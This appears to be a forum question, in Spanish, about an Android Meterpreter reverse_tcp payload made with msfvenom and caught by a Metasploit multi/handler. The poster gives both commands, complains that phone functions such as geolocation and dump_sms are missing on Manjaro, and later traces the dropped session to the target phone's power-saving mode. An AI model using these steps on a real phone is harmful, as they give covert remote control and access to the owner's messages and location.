He generado reverse_tcp carga de Android con msfvenom.
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip R > location
Y he configurado un escucha en mi msfconsole.
use multi/handler
set payload android/mterpreter/reverse_tcp
exploit
Cuando ejecuto la APK en el teléfono de destino, se conecta de nuevo a mí, pero cuando escribo las opciones no obtengo ninguna de las funciones de Android. Sin geolocalización, dump_sms, etc. Solo los predeterminados. También la carga útil es de 8.3Kb cuando se genera en Manjaro y 9.1Kb en Kali, por lo que falta algo.
Estoy usando Manjaro y instalé metasploit con su gestión de paquetes "pacman", metasploit es la versión 4.12.algo.
Ayer hice el mismo "truco" desde mi máquina Kali y todo estaba funcionando perfectamente, pero no puedo hacer que funcione desde Manjaro y me estoy volviendo loco. ¿Alguien tiene una idea?
EDITAR: No puedo creer que no haya visto esto. El teléfono de destino estaba en modo Stamina, que probablemente estaba matando la sesión de inmediato, ni siquiera me dio la oportunidad de escribir ayuda y ver los comandos. Una vez que desactivé el modo Stamina, todo funciona como estaba.